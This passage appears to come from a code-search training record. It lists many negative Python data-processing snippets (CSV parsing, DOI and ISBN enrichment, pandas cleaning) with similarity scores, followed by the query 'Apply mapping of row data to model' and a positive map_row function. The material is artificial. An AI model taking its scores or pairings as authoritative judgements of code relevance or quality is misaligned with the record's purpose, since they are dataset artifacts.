unzip(((item.pop(content_field), item) for item in items))", "def transform_table_data(tableRows: list, table: bigquery.Table):\n colSchema: list = table.schema\n assert len(tableRows[0]) <= len(colSchema), f'table should have at most as many columns as its schema: {len(tableRows[0])} ! 
<= {len(colSchema)}'\n formatter = []\n for schemaField in colSchema:\n fn = None\n if schemaField.field_type in ('INT64', 'INTEGER'):\n fn = get_as_int\n elif schemaField.field_type == ('FLOAT64', 'FLOAT'):\n fn = float\n elif schemaField.field_type != 'STRING': print(schemaField.field_type)\n formatter.append(fn)\n\n for row in tableRows:\n for (idx, val) in enumerate(row):\n fn = formatter[idx]\n if fn is not None:\n result = fn(val)\n row[idx] = result if result is not None else 0\n return", "def datetime_column(filepath, skiprows, skipcolumns):\n df = pd.read_csv(filepath, skiprows=skiprows)\n df = df.drop(columns = skipcolumns)\n# df = df.head(10)\n \n# return df\n\n def try_parse(df):\n# print(df.iloc[1, :])\n # try parsing some rows from each column as date\n head = df.head()\n tail = df.tail()\n for column in df.columns:\n try:\n# print(dateutil.parser.parse(df[column].iloc[-1]))\n dt_head = dateutil.parser.parse(head[column].iloc[-1])\n dt_tail = dateutil.parser.parse(tail[column].iloc[-1])\n# print('possible datetime')\n# if not date.time() == datetime.time():\n if not dt_head.time() == dt_tail.time():\n if not dt_head.date() == dt_tail.date():\n # time seems to be present (not default parser value)\n return column\n except:\n continue\n return None\n \n # try without modifying values\n rv = try_parse(df=df)\n if rv:\n return rv\n \n # try modifying values\n chars = ['-', '_', '/', '#']\n for char in chars:\n dfc = df.copy()\n for col in dfc.columns:\n try:\n dfc[col] = dfc[col].str.split(char).str.join(' ')\n except:\n pass # will only work for str type\n# print(char, dfc.iloc[1, :])\n rv = try_parse(df=dfc)\n if rv:\n return rv", "def fix_values(df, col):\n broken_values = [value for value in df[col]]\n fixed_values = []\n for value in broken_values:\n fixed_values.append(int(value.replace(',','')\n .replace('$','')))\n df[col] = fixed_values", "def _reformat_csv(self, csv):\n\n # avoid using extra backslashes because sed uses them as delimiter\n date = csv[-19:-9].replace('/', '-')\n cmds = [f'cut -d , -f 1 --complement <{csv} >{csv}.new',\n f'mv {csv}.new {csv}',\n f'sed -i \"1d\" {csv}',\n f'sed -i \"s/AS//g\" {csv}',\n f'sed -i \"s/,/\\t/g\" {csv}',\n f'sed -i \"s/$/\\t{date}/\" {csv}']\n\n utils.run_cmds(cmds)", "def format_row(values, num_decimal=3):\n new_vals = []\n for val in values:\n if np.isnan(val):\n new_val = NA_REP\n elif isinstance(val, numbers.Number):\n new_val = text_util.format_num(val, num_decimal=num_decimal)\n else:\n new_val = val\n new_vals.append(new_val)\n\n return new_vals", "def clean(self, value):\n return [f.clean(v) for v,f in zip(value, self.fields)]", "def split_mapping_file_on_field(mapping_f,\r\n mapping_field,\r\n column_rename_ids=None,\r\n include_repeat_cols=True):\r\n\r\n mapping_f = list(mapping_f)\r\n mapping_values = get_mapping_values(mapping_f, mapping_field)\r\n\r\n mapping_data, mapping_headers, _ = parse_mapping_file(mapping_f)\r\n\r\n if column_rename_ids:\r\n try:\r\n column_rename_ids = mapping_headers.index(column_rename_ids)\r\n except ValueError:\r\n raise KeyError(\"Field is not in mapping file (search is case \" +\r\n \"and white-space sensitive). \\n\\tProvided field: \" +\r\n \"%s. 
\\n\\tValid fields: %s\" % (mapping_field, ' '.join(mapping_headers)))\r\n\r\n for v in mapping_values:\r\n v_fp_str = v.replace(' ', '_')\r\n sample_ids_to_keep = sample_ids_from_metadata_description(\r\n mapping_f, valid_states_str=\"%s:%s\" % (mapping_field, v))\r\n\r\n # parse mapping file each time though the loop as filtering operates on\r\n # values\r\n mapping_data, mapping_headers, _ = parse_mapping_file(mapping_f)\r\n mapping_headers, mapping_data = filter_mapping_file(\r\n mapping_data,\r\n mapping_headers,\r\n sample_ids_to_keep,\r\n include_repeat_cols=include_repeat_cols,\r\n\r\n column_rename_ids=column_rename_ids)\r\n yield v_fp_str, format_mapping_file(mapping_headers, mapping_data)", "def _curate_data(data):\n new_data = []\n for row in data:\n flag = True\n new_row = []\n for col in row:\n if col == 'NA':\n flag = False\n break\n else:\n new_row.append(ast.literal_eval(col))\n\n if flag:\n new_data.append(new_row)\n\n return np.asarray(new_data)", "def process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup=False, no_pubmed_lookup=False,\n no_doaj_lookup=False, no_title_lookup=False, round_monetary=False,\n offsetting_mode=None, orig_file_path=None, crossref_max_retries=3):\n if len(row) != num_required_columns:\n msg = \"Line %s: \" + MESSAGES[\"num_columns\"]\n logging.error(msg, row_num, len(row), num_required_columns)\n return row\n\n empty_row = True\n for elem in row:\n if has_value(elem):\n empty_row = False\n break\n else:\n msg = \"Line %s: \" + MESSAGES[\"empty_row\"]\n logging.warning(msg, row_num)\n\n current_row = {}\n record_type = None\n\n # Copy content of identified columns and apply special processing rules\n for csv_column in column_map.values():\n index, column_type = csv_column.index, csv_column.column_type\n if empty_row:\n current_row[column_type] = \"\"\n continue\n if column_type == \"euro\" and index is not None:\n current_row[\"euro\"] = _process_euro_value(row[index], round_monetary, row_num, index, offsetting_mode)\n elif column_type == \"period\" and index is not None:\n current_row[\"period\"] = _process_period_value(row[index], row_num)\n elif column_type == \"is_hybrid\" and index is not None:\n current_row[\"is_hybrid\"] = _process_hybrid_status(row[index], row_num)\n elif column_type == \"institution\" and index is not None:\n current_row[\"institution\"] = _process_institution_value(row[index], row_num, orig_file_path, offsetting_mode)\n else:\n if index is not None and len(row[index]) > 0:\n current_row[column_type] = row[index]\n else:\n current_row[column_type] = \"NA\"\n\n doi = current_row[\"doi\"]\n if not has_value(doi) and not empty_row:\n msg = (\"Line %s: No DOI found\")\n logging.info(msg, row_num)\n current_row[\"indexed_in_crossref\"] = \"FALSE\"\n # lookup ISBNs in crossref\n additional_isbns = [row[i] for i in additional_isbn_columns]\n found_doi, r_type = _isbn_lookup(current_row, row_num, additional_isbns, doab_analysis.isbn_handling)\n if r_type is not None:\n record_type = r_type\n if found_doi is not None:\n # integrate DOI into row and restart\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = found_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n # lookup 
the book title in Crossref\n lookup_title = current_row[\"book_title\"]\n if has_value(lookup_title):\n msg = (\"Line %s: Trying to look up the book title ('%s') in Crossref...\")\n logging.info(msg, row_num, lookup_title)\n book_doi = title_lookup(lookup_title, [\"book\", \"monograph\", \"reference-book\"])\n if book_doi:\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = book_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n if has_value(doi):\n # Normalise DOI\n norm_doi = get_normalised_DOI(doi)\n if norm_doi is not None and norm_doi != doi:\n current_row[\"doi\"] = norm_doi\n msg = MESSAGES[\"doi_norm\"].format(doi, norm_doi)\n logging.info(msg)\n doi = norm_doi\n # include crossref metadata\n if not no_crossref_lookup:\n crossref_result = get_metadata_from_crossref(doi)\n retries = 0\n while not crossref_result[\"success\"] and crossref_result[\"error_msg\"].startswith(\"HTTPError: 504\"):\n if retries >= crossref_max_retries:\n break\n # retry on gateway timeouts, crossref API is quite busy sometimes\n msg = \"%s, retrying...\"\n logging.warning(msg, crossref_result[\"error_msg\"])\n retries += 1\n crossref_result = get_metadata_from_crossref(doi)\n if not crossref_result[\"success\"]:\n exc = crossref_result[\"exception\"]\n # check if a preprint lookup is possible\n if not no_title_lookup and type(exc) == UnsupportedDoiTypeError and exc.doi_type == \"posted-content\":\n msg = (\"Line %s: Found a DOI with type 'posted_content' (%s). This might \" +\n \"be a case of a preprint DOI, trying to find the final version of the article...\")\n logging.info(msg, row_num, doi)\n if not exc.crossref_title:\n msg = \"Line %s: Preprint lookup failed, no title could be extracted.\"\n logging.warning(msg, row_num)\n else:\n article_doi = title_lookup(exc.crossref_title, [\"journal-article\"])\n if article_doi:\n logging.info(\"New DOI integrated, restarting enrichment for current line...\")\n index = column_map[\"doi\"].index\n row[index] = article_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n if crossref_result[\"success\"]:\n data = crossref_result[\"data\"]\n record_type = data.pop(\"doi_type\")\n logging.info(\"Crossref: DOI resolved: \" + doi + \" [\" + record_type + \"]\")\n current_row[\"indexed_in_crossref\"] = \"TRUE\"\n for key, value in data.items():\n new_value = _process_crossref_results(current_row, row_num, key, value)\n old_value = current_row[key]\n current_row[key] = column_map[key].check_overwrite(old_value, new_value)\n else:\n msg = \"Line %s: Crossref: Error while trying to resolve DOI %s: %s\"\n logging.error(msg, row_num, doi, crossref_result[\"error_msg\"])\n current_row[\"indexed_in_crossref\"] = \"FALSE\"\n # lookup ISBNs in crossref and try to find a correct DOI\n additional_isbns = [row[i] for i in additional_isbn_columns]\n found_doi, r_type = _isbn_lookup(current_row, row_num, additional_isbns, doab_analysis.isbn_handling)\n if r_type is not None:\n record_type = r_type\n if found_doi is not None:\n # integrate DOI into row and restart\n logging.info(\"New DOI integrated, restarting 
enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = found_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n # include pubmed metadata\n if not no_pubmed_lookup and record_type == \"journal-article\":\n pubmed_result = get_metadata_from_pubmed(doi)\n if pubmed_result[\"success\"]:\n logging.info(\"Pubmed: DOI resolved: \" + doi)\n data = pubmed_result[\"data\"]\n for key, value in data.items():\n if value is not None:\n new_value = value\n else:\n new_value = \"NA\"\n msg = \"WARNING: Element %s not found in in response for doi %s.\"\n logging.debug(msg, key, doi)\n old_value = current_row[key]\n current_row[key] = column_map[key].check_overwrite(old_value, new_value)\n else:\n msg = \"Line %s: Pubmed: Error while trying to resolve DOI %s: %s\"\n logging.error(msg, row_num, doi, pubmed_result[\"error_msg\"])\n\n # lookup in DOAJ. try the EISSN first, then ISSN and finally print ISSN\n if not no_doaj_lookup and not empty_row:\n issns = []\n new_value = \"NA\"\n if current_row[\"issn_electronic\"] != \"NA\":\n issns.append(current_row[\"issn_electronic\"])\n if current_row[\"issn\"] != \"NA\":\n issns.append(current_row[\"issn\"])\n if current_row[\"issn_print\"] != \"NA\":\n issns.append(current_row[\"issn_print\"])\n for issn in issns:\n lookup_result = doaj_analysis.lookup(issn)\n if lookup_result:\n msg = \"DOAJ: Journal ISSN (%s) found in DOAJ offline copy ('%s').\"\n logging.info(msg, issn, lookup_result)\n new_value = \"TRUE\"\n break\n else:\n msg = \"DOAJ: Journal ISSN (%s) not found in DOAJ offline copy.\"\n new_value = \"FALSE\"\n logging.info(msg, issn)\n old_value = current_row[\"doaj\"]\n current_row[\"doaj\"] = column_map[\"doaj\"].check_overwrite(old_value, new_value)\n if record_type != \"journal-article\" and not empty_row:\n collected_isbns = []\n for isbn_field in [\"isbn\", \"isbn_print\", \"isbn_electronic\"]:\n # test and split all ISBNs\n current_row[isbn_field] = _process_isbn(row_num, current_row[isbn_field], doab_analysis.isbn_handling)\n if has_value(current_row[isbn_field]):\n collected_isbns.append(current_row[isbn_field])\n additional_isbns = [row[i] for i in additional_isbn_columns]\n for isbn in additional_isbns:\n result = _process_isbn(row_num, isbn, doab_analysis.isbn_handling)\n if has_value(result):\n collected_isbns.append(result)\n if len(collected_isbns) == 0:\n logging.info(\"No ISBN found, skipping DOAB lookup.\")\n current_row[\"doab\"] = \"NA\"\n else:\n record_type = \"book\"\n logging.info(\"Trying a DOAB lookup with the following values: \" + str(collected_isbns))\n for isbn in collected_isbns:\n doab_result = doab_analysis.lookup(isbn)\n if doab_result is not None:\n current_row[\"doab\"] = \"TRUE\"\n msg = 'DOAB: ISBN %s found in normalized DOAB (%s, \"%s\")'\n logging.info(msg, isbn, doab_result[\"publisher\"], doab_result[\"book_title\"])\n if current_row[\"indexed_in_crossref\"] == \"TRUE\":\n msg = \"Book already found in Crossref via DOI, those results take precedence\"\n logging.info(msg)\n else:\n for key in doab_result:\n current_row[key] = doab_result[key]\n if not has_value(current_row[\"isbn\"]):\n current_row[\"isbn\"] = isbn\n break\n else:\n current_row[\"doab\"] = \"FALSE\"\n msg = \"DOAB: None of the ISBNs found in DOAB\"\n logging.info(msg)\n if offsetting_mode:\n current_row[\"agreement\"] = 
offsetting_mode\n record_type = \"journal-article_transagree\"\n\n if record_type is None:\n msg = \"Line %s: Could not identify record type, using default schema 'journal-article'\"\n logging.warning(msg, row_num)\n record_type = \"journal-article\"\n\n result = []\n for field in COLUMN_SCHEMAS[record_type]:\n result.append(current_row[field])\n\n return (record_type, result)", "def pluck(field_name, rows):\n return map(picker(field_name), rows)", "def pluck(field_name, rows):\n return map(picker(field_name), rows)", "def line_to_row(line):\n m = line_re.match(line)\n if m:\n # TODO \n return m.group(1), m.group(2)\n else:\n return None", "def processRow(self, row=None, pdata=None):\n\t\tcol_name2index = getattr(pdata, 'col_name2index', None)\n\t\txValue2yValueLs = getattr(pdata, 'xValue2yValueLs', None)\n\t\ty_ls = getattr(pdata, 'y_ls', None)\n\t\tif col_name2index and xValue2yValueLs is not None:\n\t\t\tif self.whichColumnHeader:\n\t\t\t\twhichColumn = col_name2index.get(self.whichColumnHeader, None)\n\t\t\telse:\n\t\t\t\twhichColumn = self.whichColumn\n\t\t\tx_index = col_name2index.get(self.xColumnHeader, None)\n\t\t\t\n\t\t\txValue = float(row[x_index])\n\t\t\txValue = self.processValue(xValue, processType=self.logX)\n\t\t\tyValue = float(row[whichColumn])\n\t\t\tyValue = self.processValue(yValue, processType=self.logY)\n\t\t\tif xValue not in xValue2yValueLs:\n\t\t\t\txValue2yValueLs[xValue] = []\n\t\t\txValue2yValueLs[xValue].append(yValue)\n\t\t\ty_ls.append(yValue)", "def _get_xls_row_vals(self, row):\n return [v.value for v in row]", "def line_split(self, line):\n\t\tline = re.sub(r\"`(.*?)'\", quote_replace, line)\n\t\tline = line.translate(None, '.:,()+*')\n\t\treturn line.split()", "def pre_process_multispace(filepath, delimiter=\" \"):\n newpath = filepath+\".rev.csv\"\n with open(filepath, \"r\") as src_csv_file:\n with open(newpath, \"w\") as dst_csv_file:\n for src_line in src_csv_file:\n dst_csv_file.write(delimiter.join(src_line.split())+\"\\n\")", "def parse_row(self, response, row):\n raise NotImplementedError", "def _splitFieldValue(self, line):\n found = self.FIELDVALUE.findall(line)\n if found:\n fieldName, value = found[0]\n if fieldName in self.C.ADAPTER_COMMAFIELDS:\n value = self.COMMASPLIT.findall(value)[:-1] # Split and remove last empty part\n return fieldName, value\n return None, None # No field name match on this line.", "def expandFromColumn(inputColumn,replaceList):\n \n import pandas as pd\n import re\n \n #necessary, due to escape nonsense\n inputColumn=inputColumn.replace(regex=True, to_replace='\\\\\\\\',value='/')\n \n replaceList['changeNum']=0\n replaceList['changeIndexes']=''\n\n for index, row in replaceList.iterrows():\n curReplaceVal=row[0]\n currentRegexExpression=re.compile(curReplaceVal)\n CurrentBoolVec=inputColumn.str.contains(currentRegexExpression,na=False)\n replaceList['changeIndexes'].iloc[index]=[i for i, x in enumerate(CurrentBoolVec) if x]\n replaceList['changeNum'].iloc[index]=len(replaceList['changeIndexes'].iloc[index])\n inputColumn=inputColumn.replace(regex=True, to_replace=currentRegexExpression,value=row[1])\n return inputColumn, replaceList;", "def transform(self, record):\n if not record:\n return None\n\n # If we've got a list, hope it's a list of records. 
Recurse,\n # calling transform() on each of the list elements in order and\n # return the resulting list.\n if type(record) is list:\n results = []\n for single_record in record:\n results.append(self.transform(single_record))\n return results\n\n # Apply all patterns in order\n result = record\n for old_str, new_str in self.patterns.items():\n result = re.sub(old_str, new_str, result, self.count, self.flags)\n return result", "def _process_text_line(self, line, columns, format, lower_case, num_line,\n fill_missing=0, filter_case=None,\n strict_separator=False):\n if not isinstance(line, list) and not isinstance(\n line, tuple) and not isinstance(line, numpy.ndarray):\n if format != \"tsv\":\n raise Exception(\"unable to process format \" + format)\n line = line.strip(\"\\r\\n \").replace(\"\\n\", \" \")\n line = DatabaseCore2._split_expr.split(line)\n\n if filter_case is not None:\n line = [filter_case(s) for s in line]\n\n try:\n if fill_missing > 0:\n m = max(columns.keys())\n if m >= len(line):\n line = copy.copy(line)\n add = 0\n while m >= len(line) and add < fill_missing:\n a, b = columns[len(line)]\n if b is int:\n line.append(\"0\")\n elif b is float:\n line.append(\"0.0\")\n elif b is decimal.Decimal:\n line.append(\"0\")\n elif b is str:\n line.append(\"\")\n else:\n line.append(\"\")\n add += 1\n\n res = {}\n for c, v in columns.items():\n if \"AUTOFILL\" in v:\n res[v[0]] = \"NULL\"\n elif \"AUTOINCREMENT\" in v:\n continue\n else:\n if c >= len(line):\n self.LOG(\n \"(a)line number \",\n num_line,\n \"*unable to process a line columns \",\n c,\n \"#\",\n line,\n \" columns \",\n columns)\n return None\n\n val = line[c]\n if len(v) > 2 and v[2].lower() not in [\n \"primarykey\", \"autofill\"]:\n val = v[2](val)\n\n try:\n if isinstance(v[1], tuple):\n val = v[1][0](val)\n elif v[1] is datetime.datetime:\n if isinstance(val, datetime.datetime):\n pass\n elif isinstance(val, str):\n val = datetime.datetime.parse(val)\n else:\n raise TypeError(\n \"unable to convert %s into datetime\" % str(\n type(val)))\n else:\n val = v[1](val)\n except ValueError: # as e :\n self.LOG(\n \"(b)line number \",\n num_line,\n \"**unable to process a line columns \",\n c,\n \"#\",\n v[0],\n \" type \",\n v[1],\n \" value \",\n repr(\n line[c]))\n return None\n\n if isinstance(val, str):\n val = val.replace(\"'\", \"''\")\n if lower_case:\n val = val.lower()\n res[v[0]] = val\n\n return res\n except Exception:\n self.LOG(\"(c)line number\", num_line,\n \"***unable to process a line columns:\", line)\n return None", "def clean_types(data: Iterable[dict]) -> List[dict]:\n data_copy = []\n for row in data:\n row_copy = {}\n for col, val in row.items():\n if type(val) == date:\n row_copy[col] = datetime.combine(val, time())\n elif type(val) == list:\n if not val:\n row_copy[col] = None\n else:\n row_copy[col] = ','.join(str(el) if el is not None else 'NULL' for el in val)\n elif type(val) == dict:\n row_copy[col] = str(val)\n else:\n row_copy[col] = val\n\n data_copy.append(row_copy)\n\n return data_copy", "def replace_invalid_values(row):\n invalid_values = [math.inf, -math.inf, math.nan]\n return [x if x not in invalid_values else None for x in row]", "def convert_series_to_proto_values(row: pd.Series):\n\n feature_row = FeatureRowProto.FeatureRow(\n event_timestamp=_pd_datetime_to_timestamp_proto(\n dataframe[DATETIME_COLUMN].dtype, row[DATETIME_COLUMN]\n ),\n feature_set=feature_set.project + \"/\" + feature_set.name,\n )\n\n for field_name, field in feature_set.fields.items():\n 
feature_row.fields.extend(\n [\n FieldProto.Field(\n name=field.name,\n value=_python_value_to_proto_value(\n field.dtype, row[field.name]\n ),\n )\n ]\n )\n return feature_row", "def split_records(data, delimiter=r\"\\r\\n\"):\n # https://stackoverflow.com/a/2787979\n return re.split(delimiter + \"\"\"(?=(?:[^'\"]|'[^']*'|\"[^\"]*\")*$)\"\"\", data)", "def change_date(csv_list_of_rows, time_column_name, date_format, seconds_forward):\n time_column_indices = find_item_positions(csv_list_of_rows, time_column_name, 0)\n if time_column_indices == []:\n sys.stderr.write('The following column of data was not found: ' + time_column_name + '\\n')\n row_count = 0\n for time_column_index in time_column_indices:\n while row_count < len(csv_list_of_rows):\n if row_count > 0:\n try:\n if '�' not in csv_list_of_rows[row_count][time_column_index]:\n csv_date = datetime.datetime.strptime(csv_list_of_rows[row_count][time_column_index], date_format)\n eastern_time = csv_date + datetime.timedelta(seconds = seconds_forward)\n csv_list_of_rows[row_count][time_column_index] = eastern_time.strftime(date_format)\n else:\n sys.stderr.write('The URC turned a date field for row ' + str(row_count) + ' into something unparseable: ' + str(csv_list_of_rows[row_count][time_column_index]) + ' so we are dropping the row\\n')\n del csv_list_of_rows[row_count]\n row_count -= 1\n except Exception as ex:\n sys.stderr.write('Row ' + str(row_count) + ' causes an exception so we will leave this date alone: ' + str(ex) + '\\n')\n row_count += 1\n return csv_list_of_rows", "def blob_to_list(blob):\r\n splits = blob.split(blob_delimiter)\r\n items = []\r\n for item in splits:\r\n items.append(item.replace(blob_delimiter_replacement, blob_delimiter))\r\n return items" ]
[ "0.6390672", "0.61461806", "0.61275697", "0.6075597", "0.6021947", "0.60119367", "0.5930786", "0.5849591", "0.5666509", "0.56609106", "0.562658", "0.56255656", "0.5619078", "0.5576439", "0.55647933", "0.55612415", "0.5549309", "0.5546282", "0.5542975", "0.5528512", "0.55209035", "0.550323", "0.5479354", "0.5450724", "0.5448862", "0.5436596", "0.5429882", "0.54264444", "0.5417858", "0.53455025", "0.52947044", "0.5292469", "0.5284172", "0.5244553", "0.5236786", "0.5225136", "0.52204067", "0.5219918", "0.51894134", "0.51666695", "0.51593035", "0.5153406", "0.5138278", "0.5135327", "0.51325226", "0.50971746", "0.50841427", "0.50603807", "0.505741", "0.50458294", "0.5039518", "0.5029", "0.5010358", "0.5007231", "0.49989843", "0.49963996", "0.4973466", "0.4961982", "0.4959455", "0.49575475", "0.49561194", "0.49554053", "0.4947146", "0.49459028", "0.4939512", "0.49280885", "0.4924494", "0.49097586", "0.49072403", "0.49041232", "0.49034575", "0.4887407", "0.48824015", "0.4882009", "0.48670644", "0.4866655", "0.48591813", "0.48566964", "0.4847282", "0.48455232", "0.48453012", "0.48425043", "0.48256743", "0.48256743", "0.480151", "0.4779804", "0.47730914", "0.47715878", "0.476952", "0.47670934", "0.47621694", "0.47621423", "0.47611964", "0.4759662", "0.47557193", "0.47535652", "0.4751245", "0.47392604", "0.4738453", "0.4738412" ]
0.63998896
0
Apply mapping of row data to model.
def map_row(row, mapping, model_class, extra_data_fields=[], cleaner=None, **kwargs): initial_data = kwargs.get('initial_data', None) model = model_class() # _log.debug("map_row's mappings {}".format(mapping)) # If there are any initial states we need to set prior to mapping. if initial_data: model = apply_initial_data(model, initial_data) # concat is not used as of 2016-09-14 # concat = _set_default_concat_config(concat) for raw_field, value in row.items(): is_extra_data = True if raw_field in extra_data_fields else False # Save the value if is is not None, keep empty fields. if value is not None: model = apply_column_value(raw_field, value, model, mapping, is_extra_data, cleaner) return model
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def applyMapping(self):\n pass", "def map(self, function=lambda item: item):\n for i, row in enumerate(self):\n for j, item in enumerate(row):\n row[j] = function(item)", "def map_transfer_to_row(self, transfer):\n pass", "def _do_mapping(self):\n pass", "def Map(dataset, map_func, input_columns=None):\n return dataset.map(map_func)", "def extract_mapping(self) -> DatasetMapping:\n # store fields\n fields = []\n for col in self.data.columns:\n #get field label\n label = col\n #get field type using PANDAS_TYPE (see apps.utils.utils)\n col_type = self.data[col].dtype\n field_type = PANDAS_TYPE[col_type]\n #set field\n field = FieldMapping(label=label, type=field_type)\n fields.append(field)\n self.mapping.append(label)\n return DatasetMapping(fields=fields)", "def mapfn(k, v):\n for row in v:\n # completar\n pass", "def places_process_rows(self):\n\n for index in range(len(self.table)):\n row_rdf = self.places_map_row_to_rdf(self.table.iloc[index])\n if row_rdf is not None:\n self.data += row_rdf", "def map_items(self) -> None:\n self.__attribute_columns = list(self.__DataFrame.columns)\n self.__attribute_columns.remove(self.__surv_col_name)\n self.__attribute_columns.remove(self.__status_col_name)\n\n mapped_int = 0\n\n for attribute in self.__attribute_columns:\n for value in self.__DataFrame[attribute].unique():\n item_reference = (attribute, value)\n self.__item_map[item_reference] = mapped_int\n self.items_list.append(item_reference)\n mapped_int += 1", "def mapRow(this_row, header_dict, precursors_mapping, sequences_mapping, protein_mapping):\n\n if \"FullPeptideName\" in header_dict:\n\n peptide_name = this_row[header_dict[\"FullPeptideName\"]]\n\n transitions = []\n pr_transitions = []\n if \"aggr_Fragment_Annotation\" in header_dict:\n transitions = this_row[ header_dict[\"aggr_Fragment_Annotation\"] ].split(\";\")\n if \"aggr_prec_Fragment_Annotation\" in header_dict:\n pr_transitions = this_row[ header_dict[\"aggr_prec_Fragment_Annotation\"] ].split(\";\")\n\n # Skip row if there are no transitions\n if len(transitions) == 0:\n return\n\n if len(transitions[-1]) == 0:\n transitions = transitions[:-1]\n if len(pr_transitions) > 0 and len(pr_transitions[-1]) == 0:\n pr_transitions = pr_transitions[:-1]\n\n # Get charge state (may be absent)\n charge_state = \"0\"\n if \"Charge\" in header_dict:\n charge_state = this_row[header_dict[\"Charge\"]]\n\n if charge_state == \"NA\" or charge_state == \"\":\n charge_state = \"0\"\n\n key = peptide_name + \"/\" + charge_state\n prkey = peptide_name + \"/\" + charge_state + \"_pr\"\n precursors_mapping [ key ] = transitions\n precursors_mapping [ prkey ] = pr_transitions\n mapped_precursors = sequences_mapping.get( peptide_name, [] )\n mapped_precursors.extend([key, prkey])\n sequences_mapping[peptide_name] = mapped_precursors # = [ key, prkey ]\n\n if \"ProteinName\" in header_dict:\n protein_name = this_row[header_dict[\"ProteinName\"]]\n\n tmp = protein_mapping.get(protein_name, [])\n if peptide_name not in tmp:\n tmp.append(peptide_name)\n protein_mapping[protein_name] = tmp", "def process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup=False, no_pubmed_lookup=False,\n no_doaj_lookup=False, no_title_lookup=False, round_monetary=False,\n offsetting_mode=None, orig_file_path=None, crossref_max_retries=3):\n if len(row) != num_required_columns:\n msg = \"Line %s: \" + MESSAGES[\"num_columns\"]\n logging.error(msg, row_num, len(row), num_required_columns)\n 
return row\n\n empty_row = True\n for elem in row:\n if has_value(elem):\n empty_row = False\n break\n else:\n msg = \"Line %s: \" + MESSAGES[\"empty_row\"]\n logging.warning(msg, row_num)\n\n current_row = {}\n record_type = None\n\n # Copy content of identified columns and apply special processing rules\n for csv_column in column_map.values():\n index, column_type = csv_column.index, csv_column.column_type\n if empty_row:\n current_row[column_type] = \"\"\n continue\n if column_type == \"euro\" and index is not None:\n current_row[\"euro\"] = _process_euro_value(row[index], round_monetary, row_num, index, offsetting_mode)\n elif column_type == \"period\" and index is not None:\n current_row[\"period\"] = _process_period_value(row[index], row_num)\n elif column_type == \"is_hybrid\" and index is not None:\n current_row[\"is_hybrid\"] = _process_hybrid_status(row[index], row_num)\n elif column_type == \"institution\" and index is not None:\n current_row[\"institution\"] = _process_institution_value(row[index], row_num, orig_file_path, offsetting_mode)\n else:\n if index is not None and len(row[index]) > 0:\n current_row[column_type] = row[index]\n else:\n current_row[column_type] = \"NA\"\n\n doi = current_row[\"doi\"]\n if not has_value(doi) and not empty_row:\n msg = (\"Line %s: No DOI found\")\n logging.info(msg, row_num)\n current_row[\"indexed_in_crossref\"] = \"FALSE\"\n # lookup ISBNs in crossref\n additional_isbns = [row[i] for i in additional_isbn_columns]\n found_doi, r_type = _isbn_lookup(current_row, row_num, additional_isbns, doab_analysis.isbn_handling)\n if r_type is not None:\n record_type = r_type\n if found_doi is not None:\n # integrate DOI into row and restart\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = found_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n # lookup the book title in Crossref\n lookup_title = current_row[\"book_title\"]\n if has_value(lookup_title):\n msg = (\"Line %s: Trying to look up the book title ('%s') in Crossref...\")\n logging.info(msg, row_num, lookup_title)\n book_doi = title_lookup(lookup_title, [\"book\", \"monograph\", \"reference-book\"])\n if book_doi:\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = book_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n if has_value(doi):\n # Normalise DOI\n norm_doi = get_normalised_DOI(doi)\n if norm_doi is not None and norm_doi != doi:\n current_row[\"doi\"] = norm_doi\n msg = MESSAGES[\"doi_norm\"].format(doi, norm_doi)\n logging.info(msg)\n doi = norm_doi\n # include crossref metadata\n if not no_crossref_lookup:\n crossref_result = get_metadata_from_crossref(doi)\n retries = 0\n while not crossref_result[\"success\"] and crossref_result[\"error_msg\"].startswith(\"HTTPError: 504\"):\n if retries >= crossref_max_retries:\n break\n # retry on gateway timeouts, crossref API is quite busy sometimes\n msg = \"%s, retrying...\"\n logging.warning(msg, crossref_result[\"error_msg\"])\n retries += 1\n crossref_result = 
